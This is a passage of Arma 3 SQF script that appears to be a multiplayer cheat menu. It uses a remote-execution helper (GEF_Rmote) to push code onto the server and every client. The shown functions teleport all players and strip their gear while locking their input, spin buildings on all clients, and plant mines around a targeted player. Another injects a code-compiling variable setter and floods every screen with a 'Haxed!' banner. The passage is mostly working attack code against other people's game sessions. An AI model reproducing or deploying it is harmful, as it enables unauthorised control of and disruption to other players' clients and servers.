  1288. _sidepanelR = "Box_East_WpGEF_F" createVehicle _pos;
  1289. _sidepanelR attachTo [_battlebus, [1,0,-0.8]];
  1290. _sidepanelR setdir 90;
  1291. _sidepanelR = "Box_East_WpGEF_F" createVehicle _pos;
  1292. _sidepanelR attachTo [_battlebus, [-1,0,-0.8]];
  1293. _sidepanelR setdir 90;
  1294. _sidepanelR = "Land_Sunshade_F" createVehicle _pos;
  1295. _sidepanelR attachTo [_battlebus, [0,-1,2]];
  1296. };
  1297. };
  1298. ["Scripts From ME"] call {
  1299. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1301. GEF_DefenseSquad = {
  1302. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1304. _unit = "Rabbit_F";
  1305. switch(side player) do {
  1306. case west: {_unit = "B_Soldier_02_f";};
  1307. case east: {_unit = "O_G_Soldier_F";};
  1308. case independent: {_unit = "I_G_Soldier_F";};
  1309. case civilian: {_unit = "B_Soldier_02_f";};
  1310. };
  1312. _one = (group player) createUnit [_unit,position player,[],0,"NONE"];
  1313. _two = (group player) createUnit [_unit,position player,[],0,"NONE"];
  1314. _three = (group player) createUnit [_unit,position player,[],0,"NONE"];
  1315. _four = (group player) createUnit [_unit,position player,[],0,"NONE"];
  1317. {
  1318. _x setSkill ["aimingAccuracy",1];
  1319. _x setSkill ["aimingShake",1];
  1320. _x setSkill ["aimingSpeed",1];
  1321. _x setSkill ["endurance",1];
  1322. _x setSkill ["spotDistance",1];
  1323. _x setSkill ["spotTime",1];
  1324. _x setSkill ["courage",1];
  1325. _x setSkill ["reloadSpeed",1];
  1326. _x setSkill ["commanding",1];
  1327. _x setSkill ["general",1];
  1328. _x doFollow player;
  1329. _x allowDamage false;
  1330. _x addEventHandler ["HandleDamage",{false}];
  1331. } forEach [_one,_two,_three,_four];
  1332. (group player) setBehaviour "AWARE";
  1333. (group player) setCombatMode "YELLOW";
  1334. (group player) enableAttack true;
  1336. player addEventHandler ["FiredNear",{
  1337. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1338. _firer = _this select 1;
  1339. if((group _firer) != (group player)) then {
  1340. _units = (units (group player)) - [player];
  1341. {
  1342. _x doFire _firer;
  1343. _x setVehicleAmmo 1;
  1344. } forEach _units;
  1345. };
  1346. }];
  1347. };
  1348. GEF_SpinAllBuildings = {
  1349. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1350. _toServer = {
  1351. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1352. {
  1353. _x spawn {while{true} do {_this setdir ((getdir _this)+15);uiSleep (15/360);};};
  1354. } forEach (allmissionobjects "building");
  1355. };
  1356. [_toServer,true] call GEF_Rmote; //spin on all clients
  1357. };
  1358. GEF_TestRe = {
  1359. [{hint 'RE working!';},player] call GEF_Rmote;
  1360. };
  1361. GEF_ThunderDome = {
  1362. _to_Server = {
  1363. THUNDER_DOME = {
  1364. if(!isNil "DOME") exitWith {};
  1365. td_center = [23740,18443,0];
  1366. cargo_one = [23727,18429,0];
  1367. cargo_two = [23726,18456,0];
  1368. cargo_three = [23751,18429,0];
  1369. cargo_four = [23751,18456,0];
  1370. cargo_three_dir = 134;
  1371. cargo_four_dir = 37;
  1372. cargo_one_dir = 224;
  1373. cargo_two_dir = 322;
  1374. patrol_one = [23721,18397,0];
  1375. patrol_two = [23721,18443,0];
  1376. patrol_three = [23721,18491,0];
  1377. wreck_one = [23726,18480,0];
  1378. wreck_two = [23725,18382,0];
  1379. wreck_three = [23727,18406,0];
  1380. bunker_one = [23725,18507,0];
  1381. bunker_one_dir = 320;
  1382. bunker_two = [23751,18504,0];
  1383. bunker_two_dir = 135;
  1384. bunker_three = [23750,18480,0];
  1385. bunker_three_dir = 136;
  1386. hq_one = [23752,18403,0];
  1387. hq_one_dir = 45;
  1388. hq_two = [23752,18382,0];
  1389. hq_two_dir = 129;
  1390. default_spawn = [23750,18442,0];
  1391. heli_pos = [23782,18440,0];
  1392. loot_offsets = [
  1393. [-18.0039,-61.125,-10.1811],
  1394. [-17.0313,-45.4668,-8.18818],
  1395. [-18.2246,-46.8105,-5.83704],
  1396. [-14.9707,-37.2402,-10.1811],
  1397. [11.7949,-38.5332,-9.58827],
  1398. [15.2559,-38.7246,-9.45223],
  1399. [14.0625,-61.0625,-9.58827],
  1400. [13.791,-63.5723,-9.45223],
  1401. [1.49414,-52.0742,-7.65442],
  1402. [-1.53125,-51.3223,-7.69202],
  1403. [13.0488,-13.6582,-9.58827],
  1404. [12.3496,-17.082,-9.45223],
  1405. [-1.39258,-1.94727,-7.79428],
  1406. [1.41602,-1.92773,-7.64955],
  1407. [-12.3828,-16,-9.58827],
  1408. [-15.8691,-15.1855,-9.45223],
  1409. [-17.1289,1.04883,-8.18818],
  1410. [-18.0684,-0.878906,-5.83704],
  1411. [-15.4766,12.5195,-9.58827],
  1412. [-15.0488,15.8223,-9.45223],
  1413. [10.3223,14.8223,-9.58827],
  1414. [13.707,14.4844,-9.45223],
  1415. [9.72656,35.4629,-10.0027],
  1416. [11.5137,37.7695,-10.0027],
  1417. [-1.54688,48.1504,-7.75837],
  1418. [1.55469,48.0078,-7.63739],
  1419. [-16.0488,37.3965,-10.1811],
  1420. [-17.0469,49.0039,-8.18818],
  1421. [-17.7324,47.4531,-5.83704],
  1422. [-14.875,64.2383,-10.1811],
  1423. [10.4199,62.2832,-10.1811],
  1424. [12.0313,60.5254,-7.40108]
  1425. ];
  1426. spawn_pos = [
  1427. [23760.4,18437.9,0.00143886],
  1428. [23759.8,18435.6,0.00143886],
  1429. [23758.8,18433.3,0.00143886],
  1430. [23757.1,18431.1,0.00143886],
  1431. [23749.2,18424,0.00143886],
  1432. [23746.9,18422.5,0.00143886],
  1433. [23744.7,18421.8,0.00143886],
  1434. [23744.5,18414.6,0.00143886],
  1435. [23746.4,18414.1,0.00143886],
  1436. [23747.9,18413.1,0.00143886],
  1437. [23749.1,18411.9,0.00143886],
  1438. [23750.3,18410.7,0.00143886],
  1439. [23751.6,18409,0.00143886],
  1440. [23757.1,18402.6,0.00143886],
  1441. [23758.3,18401,0.00143886],
  1442. [23759.1,18399.2,0.00143886],
  1443. [23759.6,18397.1,0.00143886],
  1444. [23760.1,18388,0.00143886],
  1445. [23759.4,18386,0.00143886],
  1446. [23758.3,18384,0.00143886],
  1447. [23751.1,18376.1,0.00143886],
  1448. [23749.1,18374.4,0.00143886],
  1449. [23746.8,18373.2,0.00143886],
  1450. [23743.8,18374.2,0.00143886],
  1451. [23742,18374.6,0.00143886],
  1452. [23738.8,18375.2,0.00143886],
  1453. [23737.2,18375.4,0.00143886],
  1454. [23735.6,18375.7,0.00143886],
  1455. [23732.9,18376.1,0.00143886],
  1456. [23730.6,18376.9,0.00143886],
  1457. [23728.7,18377.9,0.00143886],
  1458. [23720.1,18385.5,0.00143886],
  1459. [23719.4,18387.7,0.00143886],
  1460. [23719.1,18390.6,0.00143886],
  1461. [23720.4,18402.8,0.00143886],
  1462. [23721,18405.6,0.00143886],
  1463. [23722.7,18408.4,0.00143886],
  1464. [23724.9,18410.1,0.00143886],
  1465. [23728.7,18411.1,0.00143886],
  1466. [23731,18411.7,0.00143886],
  1467. [23732.9,18412.2,0.00143886],
  1468. [23733.7,18421.6,0.00143886],
  1469. [23731.3,18422.4,0.00143886],
  1470. [23729.9,18423.3,0.00143886],
  1471. [23722.5,18430.8,0.00143886],
  1472. [23721.1,18432.8,0.00143886],
  1473. [23720.5,18434.3,0.00143886],
  1474. [23719.9,18436.2,0.00143886],
  1475. [23719.4,18438.8,0.00143886],
  1476. [23719.6,18448.4,0.00143886],
  1477. [23720,18451,0.00143886],
  1478. [23721.2,18453.5,0.00143886],
  1479. [23727.7,18460.8,0.00143886],
  1480. [23729.6,18462.1,0.00143886],
  1481. [23731.5,18463,0.00143886],
  1482. [23733.5,18463.3,0.00143886],
  1483. [23733.4,18470.9,0.00143886],
  1484. [23731.3,18471.4,0.00143886],
  1485. [23729.4,18472.5,0.00143886],
  1486. [23727.5,18473.6,0.00143886],
  1487. [23725.6,18475.2,0.00143886],
  1488. [23724,18477.3,0.00143886],
  1489. [23722.7,18479.2,0.00143886],
  1490. [23721.3,18481.4,0.00143886],
  1491. [23720.6,18483.5,0.00143886],
  1492. [23720,18485.8,0.00143886],
  1493. [23719.7,18495.6,0.00143886],
  1494. [23719.8,18498,0.00143886],
  1495. [23720.1,18500.6,0.00143886],
  1496. [23720.8,18502.5,0.00143886],
  1497. [23722,18504.2,0.00143886],
  1498. [23728.3,18510.4,0.00143886],
  1499. [23729.9,18511.4,0.00143886],
  1500. [23731.7,18512.1,0.00143886],
  1501. [23733.9,18512.4,0.00143886],
  1502. [23736.8,18511.8,0.00143886],
  1503. [23738.5,18511.3,0.00143886],
  1504. [23740.4,18510.7,0.00143886],
  1505. [23743,18510.1,0.00143886],
  1506. [23745.4,18509.5,0.00143886],
  1507. [23758.2,18500.7,0.00143886],
  1508. [23759.3,18498.7,0.00143886],
  1509. [23760.2,18488.8,0.00143886],
  1510. [23759.3,18486.3,0.00143886],
  1511. [23758.1,18484.3,0.00143886],
  1512. [23756.4,18482.6,0.00143886],
  1513. [23747.7,18473.4,0.00143886],
  1514. [23746.7,18472.5,0.00143886],
  1515. [23745.7,18471.8,0.00143886],
  1516. [23744.9,18464.4,0.00143886],
  1517. [23746.7,18463.9,0.00143886],
  1518. [23748.4,18463,0.00143886],
  1519. [23749.8,18462,0.00143886],
  1520. [23756.2,18454.6,0.00143886],
  1521. [23757.3,18453.3,0.00143886],
  1522. [23758,18452.2,0.00143886],
  1523. [23758.8,18450.5,0.00143886],
  1524. [23759.6,18447.6,0.00143886]
  1525. ];
  1526. loot_list = [
  1527. ["arifle_Katiba_C_ACO_F","30Rnd_65x39_caselesGEF_green","U_B_GhillieSuit"],
  1528. ["arifle_MXC_F","30Rnd_65x39_caselesGEF_mag","V_TacVest_khk"],
  1529. ["arifle_TRG20_ACO_pointer_F","30Rnd_556x45_Stanag","V_TacVest_brn"],
  1530. ["arifle_Mk20_Holo_F","30Rnd_556x45_Stanag","V_TacVest_blk"],
  1531. ["arifle_MXC_ACO_pointer_sndGEF_F","30Rnd_65x39_caselesGEF_green","V_TacVest_oli"],
  1532. ["arifle_MX_GL_Holo_pointer_sndGEF_F","30Rnd_65x39_caselesGEF_mag","V_TacVest_camo"],
  1533. ["SMG_02_F","30Rnd_9x21_Mag","V_HarnessO_gry"],
  1534. ["SMG_01_Holo_pointer_sndGEF_F","30Rnd_45ACP_Mag_SMG_01","V_TacVest_camo"],
  1535. ["SMG_02_ARCO_pointg_F","30Rnd_9x21_Mag","V_HarnessO_gry"],
  1536. ["hgun_PDW2000_Holo_F","30Rnd_9x21_Mag","V_HarnessOSpec_gry"],
  1537. ["hgun_PDW2000_F","30Rnd_9x21_Mag","V_HarnessO_gry"],
  1538. ["hgun_PDW2000_sndGEF_F","30Rnd_9x21_Mag","V_TacVest_camo"],
  1539. ["hgun_PDW2000_Holo_sndGEF_F","30Rnd_9x21_Mag","V_HarnessOSpec_gry"],
  1540. ["arifle_Katiba_C_ACO_F","30Rnd_65x39_caselesGEF_green","U_B_GhillieSuit"],
  1541. ["arifle_MXC_F","30Rnd_65x39_caselesGEF_mag","V_TacVest_khk"],
  1542. ["arifle_TRG20_ACO_pointer_F","30Rnd_556x45_Stanag","V_TacVest_brn"],
  1543. ["arifle_Mk20_Holo_F","30Rnd_556x45_Stanag","V_TacVest_blk"],
  1544. ["arifle_MXC_ACO_pointer_sndGEF_F","30Rnd_65x39_caselesGEF_green","V_TacVest_oli"],
  1545. ["arifle_MX_GL_Holo_pointer_sndGEF_F","30Rnd_65x39_caselesGEF_mag","V_TacVest_camo"],
  1546. ["SMG_02_F","30Rnd_9x21_Mag","V_HarnessO_gry"],
  1547. ["SMG_01_Holo_pointer_sndGEF_F","30Rnd_45ACP_Mag_SMG_01","V_TacVest_camo"],
  1548. ["SMG_02_ARCO_pointg_F","30Rnd_9x21_Mag","V_HarnessO_gry"],
  1549. ["hgun_PDW2000_Holo_F","30Rnd_9x21_Mag","V_HarnessOSpec_gry"],
  1550. ["hgun_PDW2000_F","30Rnd_9x21_Mag","V_HarnessO_gry"],
  1551. ["hgun_PDW2000_sndGEF_F","30Rnd_9x21_Mag","V_TacVest_camo"],
  1552. ["arifle_MX_GL_ACO_F","30Rnd_65x39_caselesGEF_mag","V_HarnessO_gry"],
  1553. ["arifle_MXC_Holo_F","30Rnd_65x39_caselesGEF_mag_Tracer","V_HarnessOSpec_gry"],
  1554. ["arifle_TRG21_F","30Rnd_556x45_Stanag_Tracer_Red","V_Rangemaster_belt"],
  1555. ["hgun_ACPC2_sndGEF_F","9Rnd_45ACP_Mag","V_PlateCarrierIA2_dgtl"],
  1556. ["SMG_01_ACO_F","30Rnd_9x21_Mag","V_PlateCarrier1_rgr"],
  1557. ["srifle_EBR_DMGEF_F","20Rnd_762x51_Mag","V_HarnessOSpec_brn"],
  1558. ["hgun_PDW2000_Holo_sndGEF_F","30Rnd_9x21_Mag","V_BandollierB_blk"],
  1559. ["arifle_MX_SW_Black_Hamr_pointer_F","100Rnd_65x39_caselesGEF_mag","V_TacVestIR_blk"],
  1560. ["arifle_MXC_Black_F","30Rnd_65x39_caselesGEF_mag_Tracer","V_PlateCarrier3_rgr"],
  1561. ["hgun_Pistol_heavy_02_YorriGEF_F","6Rnd_45ACP_Cylinder","V_PlateCarrier2_rgr"],
  1562. ["hgun_Pistol_heavy_01_MRD_F","11Rnd_45ACP_Mag","V_TacVest_blk_POLICE"],
  1563. ["SMG_02_ARCO_pointg_F","30Rnd_9x21_Mag","V_TacVest_camo"],
  1564. ["arifle_Mk20_GL_ACO_F","30Rnd_556x45_Stanag_Tracer_Green","V_TacVest_oli"],
  1565. ["LMG_Zafir_pointer_F","150Rnd_762x51_Box_Tracer","V_Chestrig_rgr"],
  1566. ["arifle_MX_SW_F","30Rnd_65x39_caselesGEF_mag","V_Chestrig_blk"],
  1567. ["hgun_P07_F","30Rnd_9x21_Mag","V_Chestrig_blk"],
  1568. ["arifle_Katiba_ARCO_pointer_F","30Rnd_65x39_caselesGEF_green_mag_Tracer","V_PlateCarrierIAGL_dgtl"],
  1569. ["hgun_Rook40_sndGEF_F","30Rnd_9x21_Mag","V_PlateCarrierSpec_rgr"],
  1570. ["arifle_MX_F","30Rnd_65x39_caselesGEF_mag_Tracer","V_TacVest_khk"],
  1571. ["arifle_MX_Hamr_pointer_F","30Rnd_65x39_caselesGEF_mag_Tracer","V_HarnessO_gry"],
  1572. ["srifle_LRR_SOGEF_F","7Rnd_408_Mag","V_BandollierB_rgr"]
  1573. ];
  1574. ["Domes"] call {
  1575. DOME = "Land_Dome_Big_F" createVehicle td_center;
  1576. DOME setposatl td_center;
  1577. DOME animate ["Door_3_rot",1];
  1578. DOME animate ["Door_2_rot",1];
  1580. DOME_2 = "Land_Dome_Big_F" createVehicle td_center;
  1581. DOME_2 attachto [DOME,[0,50,0]];
  1582. DOME_2 animate ["Door_2_rot",1];
  1584. DOME_3 = "Land_Dome_Big_F" createVehicle td_center;
  1585. DOME_3 attachto [DOME,[0,-50,0]];
  1586. DOME_3 animate ["Door_3_rot",1];
  1587. };
  1588. ["Interior Buildings"] call {
  1589. WRECK_2 = "Land_Wreck_Offroad2_F" createVehicle wreck_two;
  1590. WRECK_2 setposatl wreck_two;
  1592. WRECK_3 = "Land_Wreck_Skodovka_F" createVehicle wreck_three;
  1593. WRECK_3 setposatl wreck_three;
  1595. HQ_2 = "Land_Research_house_V1_F" createVehicle hq_two;
  1596. HQ_2 setposatl hq_two;
  1597. HQ_2 setdir hq_two_dir;
  1599. HQ = "Land_Medevac_house_V1_F" createVehicle hq_one;
  1600. HQ setposatl hq_one;
  1601. HQ setdir hq_one_dir;
  1603. BUNKER_3 = "Land_BagBunker_Large_F" createVehicle bunker_three;
  1604. BUNKER_3 setposatl bunker_three;
  1605. BUNKER_3 setdir bunker_three_dir;
  1607. BUNKER_2 = "Land_BagBunker_Tower_F" createVehicle bunker_two;
  1608. BUNKER_2 setposatl bunker_two;
  1609. BUNKER_2 setdir bunker_two_dir;
  1611. BUNKER = "Land_BagBunker_Small_F" createVehicle bunker_one;
  1612. BUNKER setposatl bunker_one;
  1613. BUNKER setdir bunker_one_dir;
  1615. WRECK = "Land_Wreck_CarDismantled_F" createVehicle wreck_one;
  1616. WRECK setposatl wreck_one;
  1618. CARGO_3 = "Land_Cargo_House_V1_F" createVehicle td_center;
  1619. CARGO_3 setposatl cargo_three;
  1620. CARGO_3 setdir cargo_three_dir;
  1622. CARGO_4 = "Land_Cargo_House_V1_F" createVehicle td_center;
  1623. CARGO_4 setposatl cargo_four;
  1624. CARGO_4 setdir cargo_four_dir;
  1626. PATROL = "Land_Cargo_Patrol_V1_F" createVehicle td_center;
  1627. PATROL setposatl patrol_one;
  1629. PATROL_2 = "Land_Cargo_Patrol_V1_F" createVehicle td_center;
  1630. PATROL_2 setposatl patrol_two;
  1632. PATROL_3 = "Land_Cargo_Patrol_V1_F" createVehicle td_center;
  1633. PATROL_3 setposatl patrol_three;
  1635. CARGO = "Land_Cargo_House_V2_F" createVehicle td_center;
  1636. CARGO setposatl cargo_one;
  1637. CARGO setdir cargo_one_dir;
  1639. CARGO_2 = "Land_Cargo_House_V2_F" createVehicle td_center;
  1640. CARGO_2 setposatl cargo_two;
  1641. CARGO_2 setdir cargo_two_dir;
  1643. TOWER = "Land_Castle_01_tower_ruinGEF_F" createVehicle td_center;
  1644. TOWER setposatl (getposatl DOME);
  1646. TOWER_3 = "Land_Castle_01_tower_ruinGEF_F" createVehicle td_center;
  1647. TOWER_3 setposatl (getposatl DOME_3);
  1649. TOWER_2 = "Land_Castle_01_tower_ruinGEF_F" createVehicle td_center;
  1650. TOWER_2 setposatl (getposatl DOME_2);
  1651. };
  1652. ["Block Exit Of Dome 2"] call {
  1653. DOOR_BLOCK_2_2 = "BlockConcrete_F" createVehicle td_center;
  1654. DOOR_BLOCK_2_2 attachto [DOME_2,[-2.792969,23.0508,-9.1811]];
  1655. DOOR_BLOCK_2_3 = "BlockConcrete_F" createVehicle td_center;
  1656. DOOR_BLOCK_2_3 attachto [DOME_2,[1.792969,23.0508,-9.1811]];
  1657. DOOR_BLOCK_2_4 = "BlockConcrete_F" createVehicle td_center;
  1658. DOOR_BLOCK_2_4 attachto [DOME_2,[-0.792969,23.0508,-7.1811]];
  1659. DOOR_BLOCK_2_5 = "BlockConcrete_F" createVehicle td_center;
  1660. DOOR_BLOCK_2_5 attachto [DOME_2,[-0.792969,23.0508,-5.1811]];
  1661. };
  1662. ["Block Exit Of Dome 3"] call {
  1663. DOOR_BLOCK_3_2 = "BlockConcrete_F" createVehicle td_center;
  1664. DOOR_BLOCK_3_2 attachto [DOME_3,[-2.792969,-23.0508,-9.1811]];
  1665. DOOR_BLOCK_3_3 = "BlockConcrete_F" createVehicle td_center;
  1666. DOOR_BLOCK_3_3 attachto [DOME_3,[1.792969,-23.0508,-9.1811]];
  1667. DOOR_BLOCK_3_4 = "BlockConcrete_F" createVehicle td_center;
  1668. DOOR_BLOCK_3_4 attachto [DOME_3,[-0.792969,-23.0508,-7.1811]];
  1669. DOOR_BLOCK_3_5 = "BlockConcrete_F" createVehicle td_center;
  1670. DOOR_BLOCK_3_5 attachto [DOME_3,[-0.792969,-23.0508,-5.1811]];
  1671. };
  1672. ["Removable Exits"] call {
  1673. DOOR_BLOCK = "BlockConcrete_F" createVehicle td_center;
  1674. DOOR_BLOCK attachto [DOME,[20.4336,-0.151953,-9.1811]];
  1676. DOOR_BLOCK_2 = "BlockConcrete_F" createVehicle td_center;
  1677. DOOR_BLOCK_2 attachto [DOME_2,[20.4336,-0.151953,-9.1811]];
  1679. DOOR_BLOCK_3 = "BlockConcrete_F" createVehicle td_center;
  1680. DOOR_BLOCK_3 attachto [DOME_3,[20.4336,-0.151953,-9.1811]];
  1681. };
  1682. ["Generate Loot"] call {
  1683. {
  1684. _loot = "groundWeaponHolder" createVehicle [0,0,0];
  1685. _offset = _x;
  1686. _offset set[2,(_x select 2)+0.65];
  1687. _loot attachto [DOME,_offset];
  1689. _lootItem = loot_list select floor(random(count(loot_list)));
  1690. _loot addWeaponCargoGlobal [_lootItem select 0,1];
  1691. _loot addMagazineCargoGlobal [_lootItem select 1,5];
  1692. _loot addItemCargoGlobal [_lootItem select 2,1];
  1693. } forEach loot_offsets;
  1694. };
  1695. ["Teleport Players And Lock Input"] call {
  1696. _getUnits = {
  1697. _units = [];
  1698. {
  1699. if(isplayer _x) then {_units = _units + [_x];};
  1700. } forEach allunits;
  1701. _units;
  1702. };
  1704. _agent = createAgent ["LOGIC",[0,0,0],[],0,"NONE"];
  1705. _agent addMPEventHandler ["MPkilled",{disableuserinput true;titletext["Please Wait...","BLACK"];_x = player;removeallweapons _x;removeallitems _x;removeallassigneditems _x;removeallcontainers _x;removebackpack _x;removeheadgear _x;removegoggles _x;}];
  1706. _agent setDamage 1;
  1707. deleteVehicle _agent;
  1708. {
  1709. _pos = default_spawn;
  1710. if(_forEachIndex < count(spawn_pos)) then {_pos = spawn_pos select _forEachIndex;};
  1711. _x setposatl _pos;
  1712. } forEach (call _getUnits);
  1713. };
  1714. ["Notify Players Of Rules"] call {
  1715. _agent = createAgent ["LOGIC",[0,0,0],[],0,"NONE"];
  1716. _agent addMPEventHandler ["MPkilled",{titlefadeout 0;titletext["After 5 Minutes the doors located at the front of the dome will open and a helicopter will spawn!","BLACK"];}];
  1717. _agent setDamage 1;
  1718. deleteVehicle _agent;
  1719. uiSleep 5;
  1720. _agent = createAgent ["LOGIC",[0,0,0],[],0,"NONE"];
  1721. _agent addMPEventHandler ["MPkilled",{titlefadeout 1;}];
  1722. _agent setDamage 1;
  1723. deleteVehicle _agent;
  1724. };
  1725. ["Start Match"] call {
  1726. _agent = createAgent ["LOGIC",[0,0,0],[],0,"NONE"];
  1727. _agent addMPEventHandler ["MPkilled",{disableuserinput false;cuttext["Let the Thunderdome! Begin!","PLAIN"];}];
  1728. _agent setDamage 1;
  1729. deleteVehicle _agent;
  1730. };
  1731. ["5 Min Timer"] call {
  1732. uiSleep 59*5;
  1733. };
  1734. ["Remove Doors and Spawn Chopper!"] call {
  1735. _heli = "B_Heli_Transport_01_F" createVehicle heli_pos;
  1736. _heli setposatl heli_pos;
  1737. uiSleep 5;
  1738. _agent = createAgent ["LOGIC",[0,0,0],[],0,"NONE"];
  1739. _agent addMPEventHandler ["MPkilled",{cuttext["The Doors Are Now Open! Go Get Your Chopper!","PLAIN"];}];
  1740. _agent setDamage 1;
  1741. deleteVehicle _agent;
  1742. deleteVehicle DOOR_BLOCK;
  1743. deleteVehicle DOOR_BLOCK_2;
  1744. deleteVehicle DOOR_BLOCK_3;
  1745. };
  1746. };
  1747. };
  1748. [_to_Server,false] call GEF_Rmote;
  1749. call _to_Server; //check script error
  1750. hint 'loading thunderdome';
  1751. waitUntil{(markerText "SwagMarker") == ""};
  1752. hint 'thunderdome started!';
  1753. [{waitUntil{!isNil "THUNDER_DOME"};[] spawn THUNDER_DOME;},false] call GEF_Rmote;
  1755. };
  1756. GEF_Tracers = {
  1757. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1758. if(GEF_TracerGEF_Toggle) then {
  1759. [player,5,true] call mp_drawTracer;
  1760. } else {
  1761. [player,0,true] call mp_drawTracer;
  1762. };
  1763. };
  1764. GEF_Advertise = {
  1765. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1766. _code = {
  1767. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1768. mp_setVar = {
  1769. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1770. _var = _this select 0;
  1771. _val = _this select 1;
  1772. call compile format["%1 = %2;",_var,_val];
  1773. };
  1774. };
  1775. if(isNil 'mp_setVar') then {
  1776. call _code;
  1777. [_code,true] call GEF_Rmote;//Broadcast setVar
  1778. hint 'Setting up command';
  1779. uiSleep 1;
  1780. hint 'Setting up command.';
  1781. uiSleep 1;
  1782. //Set up mp_advert
  1783. _code = {
  1784. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1785. ["mp_advert",{
  1786. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1787. disableserialization;
  1788. _idd = _this select 0;
  1789. _message = _this select 1;
  1790. while{true} do {
  1791. waitUntil {!isNull (findDisplay _idd)};
  1792. _display = (findDisplay _idd);
  1794. _width = (safezonew);
  1795. _height = (safezoneh/30);
  1796. _x = safezonex+(safezonew/2) - (_width/2);
  1797. _y = safezoney;
  1799. _advert = _display ctrlCreate ["RscStructuredText",-1];
  1800. _advert ctrlsetbackgroundcolor [0,0,0,0];
  1801. _advert ctrlsettextcolor [0,1,1,1];
  1802. _advert ctrlSetPosition[_x,_y,_width,_height];
  1803. _advert ctrlSetStructuredText parseText ("<t align=""center"">"+_message+"</t>");
  1804. _advert ctrlCommit 0;
  1806. waitUntil {isNull (findDisplay _idd)};
  1807. };
  1808. }] call mp_setVar;
  1809. };
  1810. [_code,true] call GEF_Rmote;
  1811. hint 'Setting up command..';
  1812. uiSleep 1;
  1813. hint 'Setting up command...';
  1814. uiSleep 1;
  1815. };
  1816. _code = {
  1817. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1818. for "_i" from 0 to 50 do {
  1819. [_i,"Guess Who Just Got Haxed! You! (-.(-.(-.-).-).-)"] spawn mp_advert;
  1820. };
  1821. };
  1822. [_code,true] call GEF_Rmote;
  1823. hint 'Hacked!';
  1824. };
  1825. GEF_SpinCursorTarget = {
  1826. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1827. if(isNil 'GEF_SpinCursorTarget_FirstRun') then {
  1828. _toServer = {
  1829. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1830. SPIN_TARGET = {
  1831. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1832. _target = _this;
  1833. while{true} do {
  1834. _target setDir ((getDir _target)+15);
  1835. uiSleep (1/15);
  1836. };
  1837. };
  1838. };
  1839. [_toServer,false] call GEF_Rmote;
  1840. [_toServer,true] call GEF_Rmote;
  1841. GEF_SpinCursorTarget_FirstRun = true;
  1842. };
  1843. [format["(objectFromNetID '%1') spawn SPIN_TARGET;",netId cursorTarget],false] call GEF_Rmote;
  1844. [format["(objectFromNetID '%1') spawn SPIN_TARGET;",netId cursorTarget],true] call GEF_Rmote;
  1845. };
  1846. GEF_MineTarget = {
  1847. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1848. _target_peter_cus = _this call mp_GetObject;
  1849. _pos2 = [0,0,50];
  1851. _xx = -5;
  1852. _y = 5;
  1853. _move = false;
  1855. for '_i' from 0 to 10 do {
  1856. _object = createMine ["APERSMine", _pos2, [], 0];
  1857. _object attachTo [_target_peter_cus,[_xx,_y,3]];
  1858. _objPos = getPosATL _object;
  1859. detach _object;
  1861. _object setPosATL [_objPos select 0, _objPos select 1, .1];
  1862. _object setvectorup [0,0,1];
  1863. _xx = _xx + 1;
  1864. };
  1866. _xx = -5;
  1867. _y = -5;
  1869. for '_i' from 0 to 10 do {
  1870. _object = createMine ["APERSMine", _pos2, [], 0];
  1871. _object attachTo [_target_peter_cus,[_xx,_y,3]];
  1872. _objPos = getPosATL _object;
  1873. detach _object;
  1875. _object setPosATL [_objPos select 0, _objPos select 1, .1];
  1876. _object setvectorup [0,0,1];
  1877. _xx = _xx + 1;
  1878. };
  1880. _xx = -5;
  1881. _y = 5;
  1883. for '_i' from 0 to 10 do {
  1884. _object = createMine ["APERSMine", _pos2, [], 0];
  1885. _object attachTo [_target_peter_cus,[_xx,_y,3]];
  1886. _objPos = getPosATL _object;
  1887. detach _object;
  1889. _object setPosATL [_objPos select 0, _objPos select 1, .1];
  1890. _object setvectorup [0,0,1];
  1891. _y = _y -1;
  1892. };
  1894. _xx = 5;
  1895. _y = 5;
  1897. for '_i' from 0 to 10 do {
  1898. _object = createMine ["APERSMine", _pos2, [], 0];
  1899. _object attachTo [_target_peter_cus,[_xx,_y,3]];
  1900. _objPos = getPosATL _object;
  1901. detach _object;
  1903. _object setPosATL [_objPos select 0, _objPos select 1, .1];
  1904. _object setvectorup [0,0,1];
  1905. _y = _y -1;
  1906. };
  1907. _move =true;
  1909. hint 'The Target Has Been Mined!';
  1910. };
  1911. GEF_hackBox = {
  1912. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1913. hint 'Loading HackBox-2000...';
  1914. _dir = getdir vehicle player;
  1915. _pos = getPos vehicle player;
  1916. _pos = [(_pos select 0)+1.5*sin(_dir),(_pos select 1)+1.5*cos(_dir),0];
  1917. _box_cus = "box_NATO_AMMO_F" createVehicleLocal _pos;
  1919. clearWeaponCargo _box_cus;
  1920. clearMagazineCargo _box_cus;
  1921. clearItemCargo _box_cus;
  1922. clearBackpackCargo _box_cus;
  1924. _cfgweapons = configFile >> "CfgWeapons";
  1925. _weapons = [];
  1926. for "_i" from 0 to (count _cfgWeapons)-1 do
  1927. {
  1928. _cur_wep_cus = _cfgweapons select _i;
